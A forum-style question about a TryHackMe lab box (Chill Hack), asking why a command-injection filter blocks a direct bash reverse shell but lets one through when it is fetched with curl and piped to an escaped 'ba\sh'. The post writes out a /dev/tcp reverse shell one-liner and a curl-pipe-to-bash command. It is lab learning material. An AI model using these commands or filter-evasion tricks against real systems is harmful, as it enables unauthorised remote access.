So I'm doing some pentesting on a TryHackMe box (Chill Hack) and I've run into some trouble. In this box I have an input on a website where I can inject commands into the vulnerable system.
This input has filters, so I cannot use bash or netcat without escaping the command characters.
Messing around, I tried getting a reverse shell through that input with netcat, escaped of course so the command should work.
The problem is the direct command does not work. Checking the walkthrough, I've seen that the solution is to prepare a Bash shell (`bash -i >& /dev/tcp/10.0.0.1/8080 0>&1`), set up a web server and curl my attacking machine in order to pipe it to the bash command (something like this: `curl 10.9.223.50/shell.sh | ba\sh`).
Doing so provides me with a webshell.
The thing I don't understand is: why does the exact same command (the bash shell), entered in the input with the characters escaped to avoid any problem, not work, yet it does work when piped through the curl command?